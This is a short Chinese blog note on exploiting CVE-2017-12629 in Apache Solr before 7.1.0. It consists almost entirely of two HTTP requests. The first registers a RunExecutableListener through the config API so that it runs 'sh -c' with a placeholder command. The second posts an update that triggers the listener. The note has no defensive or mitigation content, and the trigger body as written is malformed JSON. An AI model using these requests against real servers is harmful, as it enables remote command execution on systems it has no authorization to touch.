【笔记】CVE-2017-12629漏洞利用

发表于2024-06-26|更新于2024-07-04

|阅读量:

前言

Java的Solr框架远程命令执行漏洞利用
Solr默认端口号为8983

漏洞利用前提

Apache Solr < 7.1.0

exp

request

POST http://example.com/solr/admin/config
Content-Type: application/json

{"add-listener":{"event":"postCommit","name":"x","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c","<shell>"]}

触发

request

POST http://example.com/solr/admin/update
Content-Type: application/json

[{"x","x"}]

完成

Java

赞助

微信支付
支付宝
QQ支付
比特币
以太币
门罗币
贝宝

数据库加载中